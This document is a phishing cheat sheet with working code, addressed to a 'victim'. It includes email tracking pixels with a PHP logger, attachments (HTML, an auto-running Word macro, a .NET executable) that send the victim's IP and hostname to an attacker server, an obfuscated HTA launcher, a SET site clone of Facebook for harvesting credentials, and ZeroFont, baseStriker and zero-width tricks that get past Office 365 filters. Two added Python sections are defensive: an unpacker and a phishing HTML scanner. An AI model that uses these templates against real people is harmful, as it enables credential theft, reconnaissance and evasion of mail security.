Social Engineering Testing - Phishing
Updated on 20190527
Design a lookalike domain name using CATPHISH or DNSTWIST
CATPHISH can be retrieved at https://github.com/ring0lab/catphish
DNSTWIST can be retrieved at https://github.com/elceef/dnstwist
A1. Phishing
1. Build the email template manually using HTML.
2. Include the following HTML code to track the victim's action once the victim enables images to load while reading the mail:
<img src="http://<server_ip>/tracker.php?email=<victim_email>"/>
3. Create tracker.php and log.txt in the DocumentRoot (e.g. /var/www/html).
4. Include the following PHP code inside tracker.php:
<?php
date_default_timezone_set("Asia/Kuala_Lumpur");
$today = date("d-m-Y H:i:s");
$logMessage = "";   // stays empty (and nothing is written) when no tracked parameter is present
if (isset($_GET["email"])) {
    $logMessage = '[' . $today . '] ' . $_GET["email"] . ' read the mail.' . PHP_EOL;
}
if ($logMessage !== "") {
    $filePath = "./log.txt";
    $logFile = fopen($filePath, "a+");   // append mode; the web server user must be able to write here
    fwrite($logFile, $logMessage);
    fclose($logFile);
}
?>
5. Read log.txt to see who has tried to open the mail.
A2. Attachment (HTML)
1. Create promotion.html with the following content:
<html>
<head></head>
<body>
<script>
var ip = "";
var country = "";   // declared explicitly; otherwise it leaks as an implicit global
var xhr = new XMLHttpRequest();
xhr.open('GET', "http://ipinfo.io/json", true);
xhr.send();
xhr.addEventListener("readystatechange", processRequest, false);
function processRequest(e) {
    // readystatechange fires several times; only report once the lookup has completed
    if (xhr.readyState == 4 && xhr.status == 200) {
        var response = JSON.parse(xhr.responseText);
        ip = response.ip;
        country = response.country;
        var log = "[" + Date() + "] " + ip + " from " + country + " accessed to " + "" + " (" + window.location.href + ") with HTML attachment.\r\n";
        // encode the log so spaces, brackets and the CRLF survive the query string
        new Image().src = 'http://<server_ip>/tracker.php?attachment=' + encodeURIComponent(log);
    }
}
</script>
</body>
</html>
2. Modify tracker.php from A1 (Phishing) by adding the following code next to the existing email check:
if (isset($_GET["attachment"])) {
    $logMessage = $_GET["attachment"];
}
3. Send the victim an email with promotion.html as an attachment.
4. Read log.txt to see who has tried to open the attachment.
A3. Attachment (VBA)
1. Create and open promotion.docm.
2. Press Alt + F9 to open the Macros window. Create a macro named AutoExec:
Sub AutoExec()
    Dim MyRequest As Object
    Set MyRequest = CreateObject("WinHttp.WinHttpRequest.5.1")
    Dim DateTime As String
    Dim IPAddress As String
    Dim Hostname As String
    Dim Log As String
    DateTime = Now
    IPAddress = GetIPAddress()
    Hostname = Environ("computername")
    Log = "[" + DateTime + "] Accessed to " + IPAddress + "(" + Hostname + ")" + " with attachment."
    ' MsgBox Log
    MyRequest.Open "GET", _
        "http://<server_ip>/tracker.php?attachment=" + Log
    ' Send Request.
    MyRequest.Send
    ' MsgBox IPAddress + "accessed by " + Hostname
End Sub

Function GetIPAddress()
    Const strComputer As String = "." ' Computer name. Dot means local computer
    Dim objWMIService, IPConfigSet, IPConfig, IPAddress, i
    Dim strIPAddress As String
    ' Connect to the WMI service
    Set objWMIService = GetObject("winmgmts:" _
        & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
    ' Get all TCP/IP-enabled network adapters
    Set IPConfigSet = objWMIService.ExecQuery _
        ("Select * from Win32_NetworkAdapterConfiguration Where IPEnabled=TRUE")
    ' Get all IP addresses associated with these adapters
    For Each IPConfig In IPConfigSet
        IPAddress = IPConfig.IPAddress
        If Not IsNull(IPAddress) Then
            strIPAddress = strIPAddress & Join(IPAddress, ", ")
        End If
    Next
    GetIPAddress = strIPAddress
End Function
4. Send the attachment to the victim and read log.txt.
A4. Attachment (Executable File)
1. Create a Console App (.NET Framework) using Microsoft Visual Studio.
2. Edit Program.cs with the following code:
using System;
using System.Net;
using System.Globalization;

namespace TrackMe
{
    class Program
    {
        static void Main(string[] args)
        {
            DateTime localDate = DateTime.Now;
            var culture = new CultureInfo("en-US");
            string datetime = localDate.ToString(culture);
            IPHostEntry host;
            string localIP = "";
            string hostname = Dns.GetHostName();
            host = Dns.GetHostEntry(hostname);
            // Walk the address list; localIP ends up holding the last IPv4 address found
            foreach (IPAddress ip in host.AddressList)
            {
                if (ip.AddressFamily.ToString() == "InterNetwork")
                {
                    localIP = ip.ToString();
                }
            }
            String log = $"[{datetime}] Accessed to {localIP} ({hostname}) with attachment.";
            // Send the log line to the tracker as a query parameter
            var client = new WebClient();
            var content = client.DownloadString($"http://<server_ip>/tracker.php?attachment={log}");
        }
    }
}
3. Get the executable file (.exe) and send it to victim.
4. Study log.txt.
A5. Attachment (HTA File)
<html>
<head>
<script>
    a = new ActiveXObject('Wscript.Shell');
    a.Run("calc.exe", 0, false);
</script>
</head>
<body>
</body>
</html>
Obfuscated version (generated with https://www.cleancss.com/javascript-obfuscate/index.php):
<html>
<head>
<script>
    eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1=5 4(\'3.2\');1.6("8.7",0,9);',10,10,'|a|Shell|Wscript|ActiveXObject|new|Run|exe|calc|false'.split('|'),0,{}))
</script>
</head>
<body>
</body>
</html>
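The obfuscated HTA above uses the "p,a,c,k,e,d" JavaScript packer, which an analyst should reverse before an .hta ever runs so that the real script body can be read and triaged. The following Python is an added example, not code from the original cheat-sheet or from the obfuscation service: it decodes that packer format offline using only the standard library (words in the packed string are base-`a` indices into the `k` word table). The packed payload embedded in it is copied from the page; the function names `unpack` and `is_packed` are this example's own.

```python
"""Decoder for eval(function(p,a,c,k,e,d){...}(...)) packed JavaScript (stdlib only)."""
import re

# The obfuscated <script> body from the page's HTA, copied verbatim.
PACKED_HTA_SCRIPT = r"""eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1=5 4(\'3.2\');1.6("8.7",0,9);',10,10,'|a|Shell|Wscript|ActiveXObject|new|Run|exe|calc|false'.split('|'),0,{}))"""

# Matches the packer's trailing call: }('<p>', a, c, '<k>'.split('|'), ...)
_PACKED_ARGS = re.compile(
    r"}\('(?P<p>.*)',\s*(?P<a>\d+),\s*(?P<c>\d+),\s*'(?P<k>.*?)'\.split\('\|'\)", re.S)


def _decode_index(word, radix):
    """Reverse the packer's encoder: digits, then a-z (10-35), then A-Z (36-61)."""
    n = 0
    for ch in word:
        if ch.isdigit():
            v = ord(ch) - ord("0")
        elif ch.islower():
            v = ord(ch) - ord("a") + 10
        else:
            v = ord(ch) - ord("A") + 36
        n = n * radix + v
    return n


def is_packed(script):
    """True when the script carries the packer's characteristic argument list."""
    return bool(_PACKED_ARGS.search(script))


def unpack(packed):
    """Return the original source for a p,a,c,k,e,d packed script."""
    m = _PACKED_ARGS.search(packed)
    if not m:
        raise ValueError("not a p,a,c,k,e,d packed script")
    p = m.group("p").replace("\\'", "'")      # undo the JS single-quote escapes
    radix = int(m.group("a"))
    table = m.group("k").split("|")

    def substitute(match):
        word = match.group(0)
        if not word.isalnum():                  # underscores are never packer tokens
            return word
        idx = _decode_index(word, radix)
        # an empty table entry means the word already was its own encoding
        return table[idx] if idx < len(table) and table[idx] else word

    # every word-like token in p is an encoded index into the table
    return re.sub(r"\b\w+\b", substitute, p)


if __name__ == "__main__":
    print(unpack(PACKED_HTA_SCRIPT))
```

Running it prints the same two statements as the clear-text HTA shown earlier in this section, which is the check an analyst wants: the obfuscation layer hides nothing from a decoder that knows the format, so detection should key on the ActiveXObject/WScript.Shell behaviour rather than on the packed text.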
B1. Social Engineering Toolkit (SET)
1. Download SET from https://github.com/trustedsec/social-engineer-toolkit
2. Run setoolkit and select the following sequence of options:
1) Social-Engineering Attacks
2) Website Attack Vectors
3) Credential Harvester Attack Method
2) Site Cloner
root@kali:~/Downloads/social-engineer-toolkit-master# python setoolkit
set> 1
set> 2
set:webattack>3
set:webattack>2
3. Enter your server IP address and the website URL which you would like to clone.
set:webattack> IP address for the POST back in Harvester/Tabnabbing [192.168.231.129]:192.168.231.129
set:webattack> Enter the url to clone:https://www.facebook.com
4. Wait for the victim to click on the hyperlink in the email and enter the credentials.
5. Study the response at terminal.
B2. Gophish
1. Download Gophish at https://getgophish.com.
2. Run gophish.exe
3. Browse https://127.0.0.1:3333/login and login (default credentials: admin:gophish)
B2.1 Setup Sending Profile
B2.2 Create Mail Template
B2.3 Import Landing page
B2.4 Import User Group
B2.5 Create Campaign
A sample email as received by the victim is shown below:
The source code of the email reveals the actual link for password reset hyperlink.
B2.7 Monitor Campaign
C. Email Template
Email Storage Full
<table border="0" cellpadding="0" cellspacing="0" width="600">
  <tr>
    <td valign="top" width="300px" bgcolor="#990000"><font color="white"> 1864 MB</font></td>
    <td valign="top" width="10px" bgcolor="#c2c2a3"> </td>
    <td> 2048 MB</td>
  </tr>
</table>
Email Image
Image to Base64: https://www.ofoct.com/html5-app/image-to-css3.html
<img src="data:image/png;base64,..." />
Microsoft Office 365 Bypass
BaseStriker
baseStriker: Office 365 Security Fails To Secure 100 Million Email Users
<html>
<head>
<base href="http://localhost">
</head>
<body>
This is how <a href="dvwa">baseStriker</a> bypasses Microsoft Office 365 Safe Links.
</body>
</html>
Zero Font
ZeroFont Phishing: Manipulating Font Size to Get Past Office 365 Security
<html>
<head></head>
<body>
<h1>ZeroFont Phishing (Office 365 Bypass)</h1>
<h3><span style="font-size: 0px;">A </span>C<span style="font-size: 0px;">onvincing BEC email </span> o<span style="font-size: 0px;">r </span> p<span style="font-size: 0px;">hish</span>y t<span style="font-size: 0px;">ext </span>hi<span style="font-size: 0px;">de</span>s <span style="font-size: 0px;">with</span>in<span style="font-size: 0px;"> a </span>to<span style="font-size: 0px;">t</span> a <span style="font-size: 0px;">lly different con</span>text <span style="font-size: 0px;">. An advanc</span>ed<span style="font-size: 0px;"> f</span>i<span style="font-size: 0px;">l</span>t<span style="font-size: 0px;">er </span>or <span style="font-size: 0px;">AI sc</span>an<span style="font-size: 0px;">ner shoul</span>d see wh<span style="font-size: 0px;">at </span>y<span style="font-size: 0px;">ou do. If not,</span> your phishing filter would mis<span style="font-size: 0px;">read the way you </span>s<span style="font-size: 0px;">ee</span> it.</h3>
</body>
</html>
Zero-Width Spaces (ZWSPs)
Z-WASP Vulnerability Used to Phish Office 365 and ATP
<a href="http://www‌.google.‌com">Google</a>
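The three Office 365 bypasses above (baseStriker, ZeroFont, Z-WASP) and the tracking pixel from A1 all exploit the gap between what a text-oriented filter parses and what the recipient's mail client renders. The Python below is an added example, not code from the original cheat-sheet: a small gateway-style scanner that walks an HTML body with the standard library's HTMLParser and flags each of those four patterns, and that also returns the "filter view" (all text) next to the "recipient view" (text outside font-size:0 elements) so the ZeroFont trick is visible. The sample message, its hostnames and addresses are constructed for this example, and the function and finding names (`scan_email_html`, `tracking_pixel`, `base_rewritten_link`, `zero_width_link`, `zero_font_text`) are this example's own.

```python
"""Flag tracking pixels, <base href> rewriting, font-size:0 text and zero-width URL characters in HTML mail."""
import re
from html.parser import HTMLParser
from urllib.parse import urljoin, urlparse

# Zero-width / invisible code points commonly dropped into URLs and words (Z-WASP).
ZERO_WIDTH_RE = re.compile("[\u200b\u200c\u200d\u2060\ufeff]")
# font-size: 0 / 0px / 0pt / 0em / 0% (but not 0.5em or 10px) -> ZeroFont.
FONT_SIZE_ZERO_RE = re.compile(r"font-size\s*:\s*0(?:\.0+)?\s*(?:px|pt|em|rem|%)?\s*(?:;|$)", re.I)
VOID_TAGS = {"img", "br", "hr", "base", "meta", "link", "input", "area", "col", "source", "wbr"}


class PhishHtmlScanner(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []        # (kind, detail) pairs
        self.base_href = None
        self.all_text = []        # everything a text-only filter would tokenise
        self.visible_text = []    # what the recipient actually sees
        self.hidden_text = []     # text inside font-size:0 elements
        self._open = []           # stack of (tag, hidden?) for currently open elements

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        style = a.get("style") or ""
        if tag == "base" and a.get("href"):
            self.base_href = a["href"]
            self.findings.append(("base_href", self.base_href))
        elif tag == "img":
            src = a.get("src") or ""
            u = urlparse(src)
            # a remote image whose URL carries parameters is a read receipt; a data: URI is not
            if u.scheme in ("http", "https") and u.query:
                self.findings.append(("tracking_pixel", src))
        elif tag == "a":
            href = a.get("href") or ""
            if ZERO_WIDTH_RE.search(href):
                self.findings.append(("zero_width_link", ZERO_WIDTH_RE.sub("", href)))
            if self.base_href and not urlparse(href).scheme:
                # a relative href only resolves to its real target through <base>
                self.findings.append(("base_rewritten_link", urljoin(self.base_href, href)))
        if tag not in VOID_TAGS:
            self._open.append((tag, bool(FONT_SIZE_ZERO_RE.search(style))))

    def handle_endtag(self, tag):
        if tag in VOID_TAGS:
            return
        for i in range(len(self._open) - 1, -1, -1):   # tolerate unclosed inner tags
            if self._open[i][0] == tag:
                del self._open[i:]
                break

    def handle_data(self, data):
        self.all_text.append(data)
        if any(hidden for _, hidden in self._open):
            self.hidden_text.append(data)
        else:
            self.visible_text.append(data)


def _squash(parts):
    return " ".join("".join(parts).split())


def scan_email_html(html):
    """Scan one HTML body; returns findings plus the filter's view and the recipient's view."""
    s = PhishHtmlScanner()
    s.feed(html)
    s.close()
    hidden = _squash(s.hidden_text)
    if hidden:
        s.findings.append(("zero_font_text", hidden))
    return {
        "findings": s.findings,
        "filter_text": _squash(s.all_text),
        "visible_text": _squash(s.visible_text),
    }


# Constructed sample: hostnames and addresses are placeholders, not real infrastructure.
SAMPLE_EMAIL = (
    '<html><head><base href="http://phish-host.example"></head><body>\n'
    '<img src="http://10.0.0.5/tracker.php?email=alice@example.com"/>\n'
    '<h3>R<span style="font-size: 0px;">andom </span>eset your '
    '<span style="font-size:0px">cat </span>password</h3>\n'
    '<a href="login">Reset now</a>\n'
    '<a href="http://www\u200c.example\u200b.com">Google</a>\n'
    '</body></html>'
)

if __name__ == "__main__":
    result = scan_email_html(SAMPLE_EMAIL)
    for kind, detail in result["findings"]:
        print(f"{kind:20} {detail}")
    print("filter sees :", result["filter_text"])
    print("user sees   :", result["visible_text"])
```

Two design points matter for a real gateway: link reputation must be checked on the resolved target (`urljoin` with the `<base>` value and the zero-width characters stripped), not on the raw `href` attribute, and text classifiers should be fed the recipient view rather than the full text, otherwise the padding a ZeroFont sender inserts is exactly what the classifier scores. Inline base64 images such as the "Email Image" template above carry no query string and are deliberately not reported.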